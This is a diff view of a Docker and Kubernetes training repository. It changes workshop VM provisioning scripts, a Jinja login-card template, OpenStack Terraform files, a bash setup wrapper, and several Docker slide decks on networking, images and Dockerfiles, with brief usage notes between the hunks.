./workshopctl cards $TAG
SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
./workshopctl disableaddrchecks $TAG
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG
SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
./workshopctl disableaddrchecks $TAG
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG
#INFRA=infra/aws-us-west-1
export AWS_INSTANCE_TYPE=t3a.medium
SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kube $TAG 1.13.5
./workshopctl cards $TAG
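For reference, the same flow for a single batch boils down to a handful of commands (flag names as used in the script above; the settings file and count are just examples):
```bash
TAG=$(date +%Y-%m-%d-%H-%M)-demo
./workshopctl start \
    --tag $TAG \
    --infra infra/aws-us-west-2 \
    --settings settings/admin-dmuc.yaml \
    --count 2
./workshopctl deploy $TAG
./workshopctl cards $TAG
```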

View File

@@ -1,218 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://FIXME.container.training/" -%}
{%- set pagesize = 9 -%}
{%- set lang = "en" -%}
{%- set event = "training session" -%}
{%- set backside = False -%}
{%- set image = "kube" -%}
{%- set clusternumber = 100 -%}
{%- set image_src = {
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
"kube": "https://avatars1.githubusercontent.com/u/13629408",
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
}[image] -%}
{%- if lang == "en" and clustersize == 1 -%}
{%- set intro -%}
Here is the connection information to your very own
machine for this {{ event }}.
You can connect to this VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machine is:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clustersize != 1 -%}
{%- set intro -%}
Here is the connection information to your very own
cluster for this {{ event }}.
You can connect to each VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machines are:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize == 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
machine pour cette formation.
Vous pouvez vous connecter à cette machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresse IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clusterprefix != "node" -%}
{%- set intro -%}
Here is the connection information for the
<strong>{{ clusterprefix }}</strong> environment.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize != 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
cluster pour cette formation.
Vous pouvez vous connecter à chaque machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresses IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
{% if backside %}
height: 31%;
{% endif %}
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
/*
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
*/
/**/
width: 30%;
padding-left: 1.5%;
padding-right: 1.5%;
/**/
}
p {
margin: 0.4em 0 0.4em 0;
}
div.back {
border: 1px dotted white;
}
div.back p {
margin: 0.5em 1em 0 1em;
}
img {
height: 4em;
float: right;
margin-right: -0.2em;
}
/*
img.enix {
height: 4.0em;
margin-top: 0.4em;
}
img.kube {
height: 4.2em;
margin-top: 1.7em;
}
*/
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
<div>
<p>{{ intro }}</p>
<p>
<img src="{{ image_src }}" />
<table>
{% if clusternumber != None %}
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
{{ listhead }}
<table>
{% for node in cluster %}
<tr>
<td>{{ clusterprefix }}{{ loop.index }}:</td>
<td>{{ node }}</td>
</tr>
{% endfor %}
</table>
</p>
<p>
{{ slides_are_at }}
<center>{{ url }}</center>
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="back">
<br/>
<p>You got this at the workshop
"Getting Started With Kubernetes and Container Orchestration"
during QCON London (March 2019).</p>
<p>If you liked that workshop,
I can train your team or organization
on Docker, container, and Kubernetes,
with curriculums of 1 to 5 days.
</p>
<p>Interested? Contact me at:</p>
<p>jerome.petazzoni@gmail.com</p>
<p>Thank you!</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>

View File

@@ -1,5 +0,0 @@
resource "openstack_compute_keypair_v2" "ssh_deploy_key" {
name = "${var.prefix}"
public_key = "${file("~/.ssh/id_rsa.pub")}"
}

View File

@@ -1,32 +0,0 @@
resource "openstack_compute_instance_v2" "machine" {
count = "${var.count}"
name = "${format("%s-%04d", "${var.prefix}", count.index+1)}"
image_name = "Ubuntu 16.04.5 (Xenial Xerus)"
flavor_name = "${var.flavor}"
security_groups = ["${openstack_networking_secgroup_v2.full_access.name}"]
key_pair = "${openstack_compute_keypair_v2.ssh_deploy_key.name}"
network {
name = "${openstack_networking_network_v2.internal.name}"
fixed_ip_v4 = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
}
resource "openstack_compute_floatingip_v2" "machine" {
count = "${var.count}"
# This is something provided to us by Enix when our tenant was provisioned.
pool = "Public Floating"
}
resource "openstack_compute_floatingip_associate_v2" "machine" {
count = "${var.count}"
floating_ip = "${openstack_compute_floatingip_v2.machine.*.address[count.index]}"
instance_id = "${openstack_compute_instance_v2.machine.*.id[count.index]}"
fixed_ip = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
output "ip_addresses" {
value = "${join("\n", openstack_compute_floatingip_v2.machine.*.address)}"
}
variable "flavor" {}

View File

@@ -1,23 +0,0 @@
resource "openstack_networking_network_v2" "internal" {
name = "${var.prefix}"
}
resource "openstack_networking_subnet_v2" "internal" {
name = "${var.prefix}"
network_id = "${openstack_networking_network_v2.internal.id}"
cidr = "10.10.0.0/16"
ip_version = 4
dns_nameservers = ["1.1.1.1"]
}
resource "openstack_networking_router_v2" "router" {
name = "${var.prefix}"
external_network_id = "15f0c299-1f50-42a6-9aff-63ea5b75f3fc"
}
resource "openstack_networking_router_interface_v2" "router_internal" {
router_id = "${openstack_networking_router_v2.router.id}"
subnet_id = "${openstack_networking_subnet_v2.internal.id}"
}

View File

@@ -1,13 +0,0 @@
provider "openstack" {
user_name = "${var.user}"
tenant_name = "${var.tenant}"
domain_name = "${var.domain}"
password = "${var.password}"
auth_url = "${var.auth_url}"
}
variable "user" {}
variable "tenant" {}
variable "domain" {}
variable "password" {}
variable "auth_url" {}

View File

@@ -1,12 +0,0 @@
resource "openstack_networking_secgroup_v2" "full_access" {
name = "${var.prefix} - full access"
}
resource "openstack_networking_secgroup_rule_v2" "full_access" {
direction = "ingress"
ethertype = "IPv4"
protocol = ""
remote_ip_prefix = "0.0.0.0/0"
security_group_id = "${openstack_networking_secgroup_v2.full_access.id}"
}

View File

@@ -1,8 +0,0 @@
variable "prefix" {
type = "string"
}
variable "count" {
type = "string"
}
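These files use the pre-0.12 Terraform syntax; a plausible way to drive them would be the following (variable values are placeholders, and the `OS_*` environment variables are assumed to come from an OpenStack RC file):
```bash
terraform init
terraform apply \
    -var prefix=workshop -var count=4 -var flavor=GP1.M \
    -var user=$OS_USERNAME -var tenant=$OS_TENANT_NAME \
    -var domain=$OS_USER_DOMAIN_NAME -var password=$OS_PASSWORD \
    -var auth_url=$OS_AUTH_URL
terraform output ip_addresses    # one address per line, as joined above
```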

View File

@@ -1,19 +1,20 @@
#!/bin/bash
# Get the script's real directory.
# This should work whether we're being called directly or via a symlink.
# Get the script's real directory, whether we're being called directly or via a symlink
if [ -L "$0" ]; then
export SCRIPT_DIR=$(dirname $(readlink "$0"))
else
export SCRIPT_DIR=$(dirname "$0")
fi
# Load all scriptlets.
# Load all scriptlets
cd "$SCRIPT_DIR"
for lib in lib/*.sh; do
. $lib
done
TRAINER_IMAGE="preparevms_prepare-vms"
DEPENDENCIES="
aws
ssh
@@ -24,26 +25,49 @@ DEPENDENCIES="
man
"
# Check for missing dependencies, and issue a warning if necessary.
missing=0
for dependency in $DEPENDENCIES; do
if ! command -v $dependency >/dev/null; then
warning "Dependency $dependency could not be found."
missing=1
fi
done
if [ $missing = 1 ]; then
warning "At least one dependency is missing. Install it or try the image wrapper."
fi
ENVVARS="
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
AWS_DEFAULT_REGION
SSH_AUTH_SOCK
"
# Check if SSH_AUTH_SOCK is set.
# (If it's not, deployment will almost certainly fail.)
if [ -z "${SSH_AUTH_SOCK}" ]; then
warning "Environment variable SSH_AUTH_SOCK is not set."
warning "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
fi
check_envvars() {
status=0
for envvar in $ENVVARS; do
if [ -z "${!envvar}" ]; then
error "Environment variable $envvar is not set."
if [ "$envvar" = "SSH_AUTH_SOCK" ]; then
error "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
fi
status=1
fi
done
return $status
}
# Now check which command was invoked and execute it.
check_dependencies() {
status=0
for dependency in $DEPENDENCIES; do
if ! command -v $dependency >/dev/null; then
warning "Dependency $dependency could not be found."
status=1
fi
done
return $status
}
check_image() {
docker inspect $TRAINER_IMAGE >/dev/null 2>&1
}
check_envvars \
|| die "Please set all required environment variables."
check_dependencies \
|| warning "At least one dependency is missing. Install it or try the image wrapper."
# Now check which command was invoked and execute it
if [ "$1" ]; then
cmd="$1"
shift
@@ -53,3 +77,6 @@ fi
fun=_cmd_$cmd
type -t $fun | grep -q function || die "Invalid command: $cmd"
$fun "$@"
# export SSH_AUTH_DIRNAME=$(dirname $SSH_AUTH_SOCK)
# docker-compose run prepare-vms "$@"
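One subtlety worth calling out in `check_envvars`: `${!envvar}` is bash indirect expansion, which expands the variable whose *name* is stored in `envvar`. A standalone sketch of the same idiom:
```bash
#!/bin/bash
AWS_DEFAULT_REGION=eu-west-1
for envvar in AWS_DEFAULT_REGION SSH_AUTH_SOCK; do
    # ${!envvar} looks up the variable named by $envvar
    if [ -z "${!envvar}" ]; then
        echo "Environment variable $envvar is not set."
    fi
done
```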

View File

@@ -1,4 +0,0 @@
FROM alpine:3.9
RUN apk add --no-cache entr py-pip git
COPY requirements.txt .
RUN pip install -r requirements.txt

View File

@@ -34,14 +34,6 @@ compile each `foo.yml` file into `foo.yml.html`.
You can also run `./build.sh forever`: it will monitor the current
directory and rebuild slides automatically when files are modified.
If you have problems running `./build.sh` (because of
Python dependencies or whatever),
you can also run `docker-compose up` in this directory.
It will start the `./build.sh forever` script in a container.
It will also start a web server exposing the slides
(but the slides should also work if you load them from your
local filesystem).
## Publishing pipeline
@@ -61,4 +53,4 @@ You can run `./slidechecker foo.yml.html` to check for
missing images and show the number of slides in that deck.
It requires `phantomjs` to be installed. It takes some
time to run so it is not yet integrated with the publishing
pipeline.
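Putting the commands mentioned in this README together (`slidechecker` needs `phantomjs`, as noted above):
```bash
./build.sh                     # compile each foo.yml into foo.yml.html
./build.sh forever             # rebuild automatically on file changes
./slidechecker foo.yml.html    # check for missing images, count slides
```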

View File

@@ -1,8 +0,0 @@
# Uncomment and/or edit one of the following lines if necessary.
#/ /kube-halfday.yml.html 200
#/ /kube-fullday.yml.html 200
#/ /kube-twodays.yml.html 200
/ /k8s-201.yml.html 200!
# And this allows to do "git clone https://container.training".
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack

View File

@@ -223,7 +223,7 @@ def check_exit_status():
def setup_tmux_and_ssh():
if subprocess.call(["tmux", "has-session"]):
logging.error("Couldn't connect to tmux. Please setup tmux first.")
ipaddr = "$IPADDR"
ipaddr = open("../../prepare-vms/ips.txt").read().split("\n")[0]
uid = os.getuid()
raise Exception("""

View File

@@ -1,6 +1,3 @@
class: title
# Advanced Dockerfiles
![construction](images/title-advanced-dockerfiles.jpg)

View File

@@ -150,84 +150,21 @@ Different deployments will use different underlying technologies.
* Ad-hoc deployments can use a master-less discovery protocol
like avahi to register and discover services.
* It is also possible to do one-shot reconfiguration of the
ambassadors. It is slightly less dynamic but has far fewer
ambassadors. It is slightly less dynamic but has much less
requirements.
* Ambassadors can be used in addition to, or instead of, overlay networks.
---
## Service meshes
## Section summary
* A service mesh is a configurable network layer.
We've learned how to:
* It can provide service discovery, high availability, load balancing, observability...
* Understand the ambassador pattern and what it is used for (service portability).
* Service meshes are particularly useful for microservices applications.
For more information about the ambassador pattern, including demos on Swarm and ECS:
* Service meshes are often implemented as proxies.
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
* Applications connect to the service mesh, which relays the connection where needed.
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
*Does that sound familiar?*
---
## Ambassadors and service meshes
* When using a service mesh, a "sidecar container" is often used as a proxy
* Our services connect (transparently) to that sidecar container
* That sidecar container figures out where to forward the traffic
... Does that sound familiar?
(It should, because service meshes are essentially app-wide or cluster-wide ambassadors!)
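As a concrete (and hedged) illustration of the ambassador pattern discussed above, here is a minimal sketch reusing the `jpetazzo/hamba` image that appears later in this diff; the backend host and app image names are placeholders:
```bash
docker network create myapp
# The ambassador: listens as "redis" on the app network,
# and relays traffic to the real backend.
docker run -d --net myapp --name redis \
    jpetazzo/hamba 6379 real-redis-host:6379
# The app connects to redis:6379 and never needs to know
# where the actual Redis server lives.
docker run -d --net myapp myapp-image
```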
---
## Some popular service meshes
... And related projects:
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
<br/>
Transparently secures service-to-service connections with mTLS.
* [Gloo](https://gloo.solo.io/)
<br/>
API gateway that can interconnect applications on VMs, containers, and serverless.
* [Istio](https://istio.io/)
<br/>
A popular service mesh.
* [Linkerd](https://linkerd.io/)
<br/>
Another popular service mesh.
---
## Learning more about service meshes
A few blog posts about service meshes:
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
<br/>
Provides historical context: how did we do before service meshes were invented?
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
<br/>
Explains the purpose of service meshes. Illustrates some NGINX features.
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
<br/>
Includes high-level overview and definitions.
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
<br/>
Includes a step-by-step demo of Linkerd.
And a video:
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)

View File

@@ -36,7 +36,7 @@ docker run jpetazzo/hamba 80 www1:80 www2:80
* Appropriate for mandatory parameters (without which the service cannot start).
* Convenient for "toolbelt" services instantiated many times.
* Convenient for "toolbelt" services instanciated many times.
(Because there is no extra step: just run it!)
@@ -63,7 +63,7 @@ docker run -e ELASTICSEARCH_URL=http://es42:9201/ kibana
* Appropriate for optional parameters (since the image can provide default values).
* Also convenient for services instantiated many times.
* Also convenient for services instanciated many times.
(It's as easy as command-line parameters.)
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
* Allows arbitrary customization and complex configuration files.
* Requires writing a configuration file. (Obviously!)
* Requires to write a configuration file. (Obviously!)
* Requires building an image to start the service.
* Requires to build an image to start the service.
* Requires rebuilding the image to reconfigure the service.
* Requires to rebuild the image to reconfigure the service.
* Requires rebuilding the image to upgrade the service.
* Requires to rebuild the image to upgrade the service.
* Configured images can be stored in registries.
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
* Allows arbitrary customization and complex configuration files.
* Requires creating a volume for each different configuration.
* Requires to create a volume for each different configuration.
* Services with identical configurations can use the same volume.
* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
* Configuration can be generated or edited through another container.
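A minimal sketch of the configuration-volume approach described in this list (image name and config contents are placeholders):
```bash
docker volume create appconfig
# Generate or edit the configuration through another container...
docker run --rm -v appconfig:/etc/appconfig alpine \
    sh -c 'echo "loglevel=debug" > /etc/appconfig/app.conf'
# ...then start the service with that volume, as shown above.
docker run -d -v appconfig:/etc/appconfig myapp
```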
@@ -198,4 +198,4 @@ E.g.:
- read the secret on stdin when the service starts,
- pass the secret using an API endpoint.

View File

@@ -144,10 +144,6 @@ At a first glance, it looks like this would be particularly useful in scripts.
However, if we want to start a container and get its ID in a reliable way,
it is better to use `docker run -d`, which we will cover in a bit.
(Using `docker ps -lq` is prone to race conditions: what happens if someone
else, or another program or script, starts another container just before
we run `docker ps -lq`?)
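The race-free alternative mentioned above looks like this (the image name is just an example):
```bash
# docker run -d prints the new container's full ID on stdout,
# so we can capture it without racing against anyone else.
CID=$(docker run -d nginx)
docker logs "$CID"
docker stop "$CID"    # graceful stop (10-second grace period)
```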
---
## View the logs of a container
@@ -257,7 +253,7 @@ $ docker kill 068 57ad
The `stop` and `kill` commands can take multiple container IDs.
Those containers will be terminated immediately (without
the 10-second delay).
the 10 seconds delay).
Let's check that our containers don't show up anymore:

View File

@@ -131,12 +131,6 @@ Sending build context to Docker daemon 2.048 kB
* Be careful (or patient) if that directory is big and your link is slow.
* You can speed up the process with a [`.dockerignore`](https://docs.docker.com/engine/reference/builder/#dockerignore-file) file
* It tells docker to ignore specific files in the directory
* Only ignore files that you won't need in the build context!
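A hedged example of such a `.dockerignore` file (the entries are typical, not prescribed by these slides):
```bash
cat > .dockerignore <<'EOF'
.git
node_modules
*.log
EOF
docker build -t myimage .   # .git, node_modules, *.log stay out of the context
```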
---
## Executing each step

View File

@@ -222,16 +222,16 @@ CMD ["hello world"]
Let's build it:
```bash
$ docker build -t myfiglet .
$ docker build -t figlet .
...
Successfully built 6e0b6a048a07
Successfully tagged myfiglet:latest
Successfully tagged figlet:latest
```
Run it without parameters:
```bash
$ docker run myfiglet
$ docker run figlet
_ _ _ _
| | | | | | | | |
| | _ | | | | __ __ ,_ | | __|
@@ -246,7 +246,7 @@ $ docker run myfiglet
Now let's pass extra arguments to the image.
```bash
$ docker run myfiglet hola mundo
$ docker run figlet hola mundo
_ _
| | | | |
| | __ | | __, _ _ _ _ _ __| __
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
What if we want to run a shell in our container?
We cannot just do `docker run myfiglet bash` because
We cannot just do `docker run figlet bash` because
that would just tell figlet to display the word "bash."
We use the `--entrypoint` parameter:
```bash
$ docker run -it --entrypoint bash myfiglet
$ docker run -it --entrypoint bash figlet
root@6027e44e2955:/#
```

View File

@@ -78,7 +78,7 @@ First step: clone the source code for the app we will be working on.
```bash
$ cd
$ git clone https://github.com/jpetazzo/trainingwheels
$ git clone git://github.com/jpetazzo/trainingwheels
...
$ cd trainingwheels
```

View File

@@ -67,8 +67,7 @@ The following list is not exhaustive.
Furthermore, we limited the scope to Linux containers.
We can also find containers (or things that look like containers) on other platforms
like Windows, macOS, Solaris, FreeBSD ...
Containers also exist (sometimes with other names) on Windows, macOS, Solaris, FreeBSD ...
---
@@ -86,7 +85,7 @@ like Windows, macOS, Solaris, FreeBSD ...
* No notion of image (container filesystems have to be managed manually).
* Networking has to be set up manually.
* Networking has to be setup manually.
---
@@ -112,7 +111,7 @@ like Windows, macOS, Solaris, FreeBSD ...
* Strong emphasis on security (through privilege separation).
* Networking has to be set up separately (e.g. through CNI plugins).
* Networking has to be setup separately (e.g. through CNI plugins).
* Partial image management (pull, but no push).
@@ -152,37 +151,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
* Basic image support (tar archives and raw disk images).
* Network has to be set up manually.
---
## Kata containers
* OCI-compliant runtime.
* Fusion of two projects: Intel Clear Containers and Hyper runV.
* Run each container in a lightweight virtual machine.
* Requires running on bare metal *or* with nested virtualization.
---
## gVisor
* OCI-compliant runtime.
* Implements a subset of the Linux kernel system calls.
* Written in Go, and itself uses a smaller subset of system calls.
* Can be heavily sandboxed.
* Can run in two modes:
* KVM (requires bare metal or nested virtualization),
* ptrace (no requirement, but slower).
* Network has to be setup manually.
---
@@ -205,3 +174,4 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
- Docker is a good default choice
- If you use Kubernetes, the engine doesn't matter

View File

@@ -107,17 +107,9 @@ class: pic
class: pic
## Two containers on a single Docker network
![bridge2](images/bridge2.png)
---
class: pic
## Two containers on two Docker networks
![bridge3](images/bridge3.png)
![bridge3](images/bridge2.png)
---
@@ -474,7 +466,7 @@ When creating a network, extra options can be provided.
* `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
---
@@ -528,9 +520,7 @@ Very short instructions:
- `docker network create mynet --driver overlay`
- `docker service create --network mynet myimage`
If you want to learn more about Swarm mode, you can check
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
or [these slides](https://container.training/swarm-selfpaced.yml.html).
See http://jpetazzo.github.io/container.training for all the deets about clustering!
---
@@ -556,7 +546,7 @@ General idea:
* So far, we have specified which network to use when starting the container.
* The Docker Engine also allows connecting and disconnecting while the container is running.
* The Docker Engine also allows to connect and disconnect while the container runs.
* This feature is exposed through the Docker API, and through two Docker CLI commands:
@@ -723,20 +713,3 @@ eth0 Link encap:Ethernet HWaddr 02:42:AC:15:00:03
...
```
]
---
class: extra-details
## Building with a custom network
* We can build a Dockerfile with a custom network with `docker build --network NAME`.
* This can be used to check that a build doesn't access the network.
(But keep in mind that most Dockerfiles will fail,
<br/>because they need to install remote packages and dependencies!)
* This may be used to access an internal package repository.
(But try to use a multi-stage build instead, if possible!)
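A sketch pulling together the options discussed in this chapter (subnet, range, and names are placeholders):
```bash
docker network create mynet \
    --subnet 10.66.0.0/16 \
    --ip-range 10.66.1.0/24 \
    --aux-address "reserved=10.66.1.10"
docker run -d --name web --net mynet nginx
# Connecting and disconnecting at runtime:
docker network disconnect mynet web
docker network connect mynet web
```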

View File

@@ -76,78 +76,6 @@ CMD ["python", "app.py"]
---
## Be careful with `chown`, `chmod`, `mv`
* Layers cannot efficiently store changes in permissions or ownership.
* Layers cannot efficiently represent a file being moved, either.
* As a result, operations like `chown`, `chmod`, `mv` can be expensive.
* For instance, in the Dockerfile snippet below, each `RUN` line
creates a layer with an entire copy of `some-file`.
```dockerfile
COPY some-file .
RUN chown www-data:www-data some-file
RUN chmod 644 some-file
RUN mv some-file /var/www
```
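One way to see this effect (hedged sketch; the image tag is a placeholder) is to build that snippet and inspect the layer sizes:
```bash
docker build -t layer-demo .
# Each chown/chmod/mv RUN line shows up as a layer containing
# a full copy of some-file.
docker history layer-demo
```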
* How can we avoid that?
---
## Put files in the right place
* Instead of using `mv`, directly put files in the right place.
* When extracting archives (tar, zip...), merge the operations into a single layer.
Example:
```dockerfile
...
RUN wget http://.../foo.tar.gz \
&& tar -zxf foo.tar.gz \
&& mv foo/fooctl /usr/local/bin \
&& rm -rf foo
...
```
---
## Use `COPY --chown`
* The Dockerfile instruction `COPY` can take a `--chown` parameter.
Examples:
```dockerfile
...
COPY --chown=1000 some-file .
COPY --chown=1000:1000 some-file .
COPY --chown=www-data:www-data some-file .
```
* The `--chown` flag can specify a user, or a user:group pair.
* The user and group can be specified as names or numbers.
* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
*(In the container, not on the host!)*
---
## Set correct permissions locally
* Instead of using `chmod`, set the right file permissions locally.
* When files are copied with `COPY`, permissions are preserved.
---
## Embedding unit tests in the build process
```dockerfile

View File

@@ -169,5 +169,5 @@ Would we give the same answers to the questions on the previous slide?
class: pic
![Cloud Native Landscape](https://landscape.cncf.io/images/landscape.png)
![Cloud Native Landscape](https://raw.githubusercontent.com/cncf/landscape/master/landscape/CloudNativeLandscape_latest.png)

View File

@@ -1,5 +0,0 @@
# Exercise — writing a Compose file
Let's write a Compose file for the wordsmith app!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -1,9 +0,0 @@
# Exercise — writing better Dockerfiles
Let's update our Dockerfiles to leverage multi-stage builds!
The code is at: https://github.com/jpetazzo/wordsmith
Use a different tag for these images, so that we can compare their sizes.
What's the size difference between single-stage and multi-stage builds?

View File

@@ -1,5 +0,0 @@
# Exercise — writing Dockerfiles
Let's write Dockerfiles for an existing application!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -203,90 +203,4 @@ bash: figlet: command not found
* The basic Ubuntu image was used, and `figlet` is not here.
---
## Where's my container?
* Can we reuse that container that we took time to customize?
*We can, but that's not the default workflow with Docker.*
* What's the default workflow, then?
*Always start with a fresh container.*
<br/>
*If we need something installed in our container, build a custom image.*
* That seems complicated!
*We'll see that it's actually pretty easy!*
* And what's the point?
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
---
## Pets vs. Cattle
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
* Pets:
* have distinctive names and unique configurations
* when they have an outage, we do everything we can to fix them
* Cattle:
* have generic names (e.g. with numbers) and generic configuration
* configuration is enforced by configuration management, golden images ...
* when they have an outage, we can replace them immediately with a new server
* What's the connection with Docker and containers?
---
## Local development environments
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
* create VM from base template (Ubuntu, CentOS...)
* install packages, set up environment
* work on project
* when done, shut down VM
* next time we need to work on project, restart VM as we left it
* if we need to tweak the environment, we do it live
* Over time, the VM configuration evolves, diverges.
* We don't have a clean, reliable, deterministic way to provision that environment.
---
## Local development with Docker
* With Docker, the workflow looks like this:
* create container image with our dev environment
* run container with that image
* work on project
* when done, shut down container
* next time we need to work on project, start a new container
* if we need to tweak the environment, we create a new image
* We have a clear definition of our environment, and can share it reliably with others.
* Let's see in the next chapters how to bake a custom image with `figlet`!
* We will see in the next chapters how to bake a custom image with `figlet`.
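In commands, that workflow could look like this (the image name is a placeholder):
```bash
docker build -t devenv .     # bake the dev environment into an image
docker run -it --rm devenv   # work in a fresh container; discard it when done
# To tweak the environment: edit the Dockerfile, rebuild, run again.
```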

View File

@@ -1,4 +1,3 @@
class: title
# Getting inside a container

View File

@@ -66,21 +66,6 @@ class: pic
---
## Differences between containers and images
* An image is a read-only filesystem.
* A container is an encapsulated set of processes,
running in a read-write copy of that filesystem.
* To optimize container boot time, *copy-on-write* is used
instead of regular copy.
* `docker run` starts a container from a given image.
---
class: pic
## Multiple containers sharing the same image
@@ -89,6 +74,20 @@ class: pic
---
## Differences between containers and images
* An image is a read-only filesystem.
* A container is an encapsulated set of processes running in a
read-write copy of that filesystem.
* To optimize container boot time, *copy-on-write* is used
instead of regular copy.
* `docker run` starts a container from a given image.
---
## Comparison with object-oriented programming
* Images are conceptually similar to *classes*.
@@ -119,7 +118,7 @@ If an image is read-only, how do we change it?
* The only way to create an image is by "freezing" a container.
* The only way to create a container is by instantiating an image.
* The only way to create a container is by instanciating an image.
* Help!
@@ -178,11 +177,8 @@ Let's explain each of them.
## Root namespace
The root namespace is for official images.
They are gated by Docker Inc.
They are generally authored and maintained by third parties.
The root namespace is for official images. They are put there by Docker Inc.,
but they are generally authored and maintained by third parties.
Those images include:
@@ -192,7 +188,7 @@ Those images include:
* Ready-to-use components and services, like redis, postgresql...
* Over 150 at this point!
* Over 130 at this point!
---
@@ -220,7 +216,7 @@ clock
---
## Self-hosted namespace
## Self-Hosted namespace
This namespace holds images which are not hosted on Docker Hub, but on third
party registries.
@@ -237,13 +233,6 @@ localhost:5000/wordpress
* `localhost:5000` is the host and port of the registry
* `wordpress` is the name of the image
Other examples:
```bash
quay.io/coreos/etcd
gcr.io/google-containers/hugo
```
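Side by side, the three namespace styles look like this (tags omitted for brevity; the images are illustrative):
```bash
docker pull ubuntu                 # root namespace (official image)
docker pull jpetazzo/clock         # user namespace (Docker Hub user/org)
docker pull quay.io/coreos/etcd    # self-hosted namespace (registry host)
```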
---
## How do you store and manage images?
@@ -363,8 +352,6 @@ Do specify tags:
* To ensure that the same version will be used everywhere.
* To ensure repeatability later.
This is similar to what we would do with `pip install`, `npm install`, etc.
---
## Section summary

Some files were not shown because too many files have changed in this diff.